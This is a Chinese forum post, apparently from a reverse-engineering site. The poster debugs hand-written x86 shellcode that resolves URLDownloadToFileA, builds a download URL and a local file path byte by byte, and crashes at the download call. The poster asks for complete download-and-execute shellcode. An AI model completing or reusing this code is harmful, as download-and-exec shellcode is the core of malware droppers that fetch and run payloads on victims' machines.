用OD看了下,程序前面部分获LoadLibrary、URLDownloadToFileA等函数的地址时都没出错,一调用URLDownloadToFileA就出错(call 地址),调试了很久,解决不了,请各位大虾帮助:
1、请问构造字符串、调用函数的一般格式,尤其是参数很多很长的函数,拿URLDownloadToFileA做例子吧;
2、如果有一个download & exec shellcode的汇编完整代码,能贴出来
就最好不过了(最好是纯汇编的);
附:我的代码(部分)
push 00004165h;查找URLDownloadToFile()函数的地址
push 6c69466fh
push 5464616fh
push 6c6e776fh
push 444c5255h
push esp ;把"URLDownloadToFile"字符串压栈
push edi ;URLMON.dll
call esi ;调用函数 GetProcAddress
mov esp,ebp;
push ebp
mov ebp,esp
xor ebx,ebx
push ebx ;在堆栈最后构造0作为字符串结尾
sub esp,2ch
mov byte ptr [ebp-30h],68h ;h
mov byte ptr [ebp-2Fh],74h ;t
mov byte ptr [ebp-2eh],74h ;t
mov byte ptr [ebp-2dh],70h ;p
mov byte ptr [ebp-2ch],3ah ;:
mov byte ptr [ebp-2bh],2fh ;/
mov byte ptr [ebp-2ah],2fh ;/
mov byte ptr [ebp-29h],77h ;w
mov byte ptr [ebp-28h],77h ;w
mov byte ptr [ebp-27h],77h ;w
mov byte ptr [ebp-26h],2eh ;.
mov byte ptr [ebp-25h],62h ;b
mov byte ptr [ebp-24h],61h ;a
mov byte ptr [ebp-23h],69h ;i
mov byte ptr [ebp-22h],64h ;d
mov byte ptr [ebp-21h],75h ;u
mov byte ptr [ebp-20h],2eh ;.
mov byte ptr [ebp-1fh],63h ;c
mov byte ptr [ebp-1eh],6fh ;o
mov byte ptr [ebp-1dh],6dh ;m
mov byte ptr [ebp-1ch],2fh ;/
mov byte ptr [ebp-1bh],69h ;i
mov byte ptr [ebp-1ah],6dh ;m
mov byte ptr [ebp-19h],67h ;g
mov byte ptr [ebp-18h],2fh ;/
mov byte ptr [ebp-17h],6ch ;l
mov byte ptr [ebp-16h],6fh ;o
mov byte ptr [ebp-15h],67h ;g
mov byte ptr [ebp-14h],6fh ;o
mov byte ptr [ebp-13h],2eh ;.
mov byte ptr [ebp-12h],67h ;g
mov byte ptr [ebp-11h],69h ;i
mov byte ptr [ebp-10h],66h ;f
mov byte ptr [ebp-0fh],0h ;0x00
mov byte ptr [ebp-0eh],43h ;C
mov byte ptr [ebp-0dh],3ah ;:
mov byte ptr [ebp-0ch],5ch ;\
mov byte ptr [ebp-0bh],62h ;b
mov byte ptr [ebp-0ah],61h ;a
mov byte ptr [ebp-09h],69h ;i
mov byte ptr [ebp-08h],64h ;d
mov byte ptr [ebp-07h],75h ;u
mov byte ptr [ebp-06h],62h ;b
mov byte ptr [ebp-05h],2eh ;.
mov byte ptr [ebp-04h],67h ;g
mov byte ptr [ebp-03h],69h ;i
mov byte ptr [ebp-02h],66h ;f
lea ebx,[ebp-31h]
push NULL
push NULL
push ebx
push NULL
push edi ;URLMON.dll
call eax ;URLDownloadToFileA
这个地方就出错了
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法